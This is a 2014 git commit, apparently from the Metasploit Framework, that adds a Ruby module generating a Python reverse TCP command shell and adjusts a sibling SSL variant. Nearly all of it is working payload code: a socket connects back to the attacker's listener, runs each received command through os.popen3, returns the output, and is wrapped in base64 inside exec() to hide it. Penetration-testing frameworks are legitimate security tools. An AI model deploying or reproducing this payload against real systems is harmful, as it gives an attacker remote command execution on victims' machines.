unstable
Meatballs 2014-06-04 02:27:06 +01:00
parent bf52c0b888
commit c032b8ce8e
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 73 additions and 7 deletions

View File

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp_ssl'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Command Shell, Reverse TCP (via python)',
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3',
'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
'License' => BSD_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'python',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
# Set up the socket
cmd << "import socket,os\n"
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
# The actual IO
cmd << "#{dead}=False\n"
cmd << "while not #{dead}:\n"
cmd << "\tdata=so.recv(1024)\n"
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
cmd << "\tso.send(stdout_value)\n"
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
cmd
end
end

View File

@ -15,12 +15,12 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
'Name' => 'Command Shell, Reverse TCP SSL (via python)',
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
'Author' => 'RageLtMan',
'License' => BSD_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_CMD,
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::ReverseTcpSsl,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'python',
@ -36,8 +36,7 @@ module Metasploit3
# Constructs the payload
#
def generate
vprint_good(command_string)
return super + command_string
super + command_string
end
#
@ -60,11 +59,10 @@ module Metasploit3
cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
cmd += "\ts.send(stdout_value)\n"
# The *nix shell wrapper to keep things clean
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
return cmd
cmd
end
end
end